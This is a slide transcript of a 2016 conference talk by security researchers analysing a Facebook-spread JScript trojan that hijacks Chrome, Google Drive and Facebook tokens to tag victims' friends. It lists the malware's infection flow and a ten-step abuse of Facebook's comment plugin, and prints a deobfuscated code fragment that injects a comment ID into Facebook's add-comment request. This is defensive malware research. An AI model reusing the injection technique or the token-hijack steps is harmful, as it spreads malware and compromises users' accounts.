[cb16] facebook malware: tag me if you can by ido naor & dani goland
TRANSCRIPT
TAG ME IF YOU CAN
Ido NaorSr. Researcher, Kaspersky Lab Tw: @idonaor1
Dani GolandFounder & CEO, Undot Tw: @danigoland
GReAT - Kaspersky Lab Elite Team Of Researchers
Global Research & Analysis Team, Since 2008
Threat Intelligence, research and innovation leadership
Focus: APTs, critical infrastructure threat, banking threats, sophisticated targeted attacks.
• A decade in security eco• Manage regional research in
Israel• ExpertiZ
• Malware analysis• Reverse Engineering• Penetration Testing
• HobbiZ Responsible Disclosure:
Undot – Uncovering Ideas
• Founder & CEO, Undot
• ExpertiZ• Full-Stack Developer• Entrepreneur• Data Science Freak
• HobbiZOrganizing and competing
in Hackathons
UndotExpertswith
Control It – Remotes Unified!
~500K downloads
Front
Mobile
Back
Cloud
IN THE NEWS…
RECAP
MENTIONED BY A FRIEND
WINDOWS DESIGNATED
• File: comment_27734045.jse• Language: JScript• Size: ~5.31 KB• MD5: 9D3DF2A89FDB7DA40CEB4DE02D605CFA• SHA1: 6D658331FE6D7F684FEE384A29CE95F561A5C2EA
JScript is Microsoft's dialect of the ECMAScript standard[2] that is used in Microsoft's Internet Explorer.
JScript is implemented as an Active Scripting engine. This means that it can be "plugged in" to OLE Automation
applications that support Active Scripting, such as Internet Explorer, Active Server Pages, and Windows Script Host.[3] It
also means such applications can use multiple Active Scripting languages, e.g., JScript, VBScript or PerlScript.
GLIMPSE INTOTHE JSE TROJAN
1) Domain name2) Msxml2.XMLHTTP3) ADODB.Stream4) Wscript.Shell5) JPG ext?6) %AppData%7) Autoit.exe8) Manifest.json9) Run.bat10) Ping.js
WHO IS REALLY AMONG US?
/Stats/history/pingjse3462
BACKGROUND CHECK
• Emerged: January 2015 on• Turkish variables and comments in its files• Threat actor: BePush/Killim• Innovative techniques to spread malware through social networks• Favor multi-layered obfuscation, mainly in JavaScript, and utilize
multi-layered URL shorteners, third-party hosting providers and multi-stage payloads.
• Obfuscate their infrastructure using Cloudflare
INITIAL INFECTION
DYNAMIC ANALYSIS
CHROME EXTENSION AS A MITM
?A HIDDEN VULNERABILITY
THE MISSING PIECE
OBFUSCATED DROPPER
DEOBFUSCATION
ANTI-ANALYSIS
• Debugger;
ANTI-ANALYSIS
• Code hashes
GOOGLE TOKEN HIJACK
• Google URL Shortner• Google Drive API
GOOGLE DRIVE AS A MALWARE HUB
VICTIM INFO STEALERDropper → Chrome Takeover → Malicious JS → Google Permissions → Uploading malware to storage → HERE
VICTIM INFO STEALER
VICTIM INFO STEALER
GOOGLE DRIVE PERMISSION MODIFICATION
CREATING MALICIOUS CALLERS
FACEBOOK TOKEN HIJACK
HOW TO FAIL SAFE
HOW TO FAIL SAFE
VULNERABILITY IN THE WILD
1) Initialize a request to the comment plugin
2) Get api_key & comment data3) Create a comment on the
plugin, containing url to Google Drive
4) Post is now posted – get its ID5) Create a new comment on the
web platform6) Inject the ID from the FB plugin
to the web FB comment ID 7) Notification generated8) FB debug check9) Set privacy to public10) Set comment text to null
deleting the traces.
this.commentData["share_id"] = globalFunction["between"]('"commentIDs":["', '"', f["responseText"])["split"]("_")[1]; // 400539608410_10153962897128411
post_params = {"ft_ent_identifier": this["commentData"]["share_id"], ← injection!!"comment_text": gF["chain"](10)["toLowerCase"](),"source": 21,"client_id": Date["now"]() + ":" + Math["floor"](U2e[F](Date["now"](), 1000)),"session_id": globalFunction["chain"](8)["toLowerCase"](),"comment_text": "Array of tagged friends"}url: "https://www.facebook.com/ufi/add/comment/?dpr=1",type: "POST",async: true,headers: { "content-type": "application/x-www-form-urlencoded"}
www.facebook.com/plugins/feedback.php?api_key=<ID>&href=https://<GOOGLE_DRIVE>/<JSE_FILE>
ALL IN ALL
QUESTIONS?
THANK YOU!Follow us on Twitter:
@IdoNaor1@DaniGoland